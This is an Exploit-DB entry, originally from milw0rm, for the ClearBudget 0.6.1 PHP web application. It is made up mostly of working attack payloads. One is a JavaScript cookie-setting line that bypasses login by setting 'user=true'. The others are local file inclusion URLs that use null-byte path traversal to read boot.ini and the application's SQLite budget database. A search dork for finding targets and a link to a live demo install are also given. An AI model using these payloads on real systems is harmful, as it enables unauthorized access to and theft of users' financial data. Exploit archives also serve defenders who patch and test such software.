ClearBudget 0.6.1 - Insecure Cookie Handling / Local File Inclusion

EDB-ID:

7992

CVE:

EDB Verified:

Author:

SirGod

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2009-02-05

Vulnerable App:

#############################################################################################
[+] ClearBudget v0.6.1 Insecure Cookie Handling / LFI
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
[+] www.hellzone.info
[+] www.anti-intruders.org
#############################################################################################

[+] Dork : ClearBudget v0.6.1

[+] Homepage : http://clearbudget.douteaud.com/


[+] Insecure Cookie Handling

    PoC : javascript:document.cookie = "user=true; path=/";

    Live Demo : http://clearbudget.douteaud.com/demo/0-6-1/


[+] Local File Inclusion

   Example : http://127.0.0.1/path/index.php?action=[Local File]%00

   PoC : http://127.0.0.1/path/index.php?action=../../../../boot.ini%00

   PoC 2 : http://127.0.0.1/path/index.php?action=../db/budget.sqlite%00

#############################################################################################

# milw0rm.com [2009-02-05]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services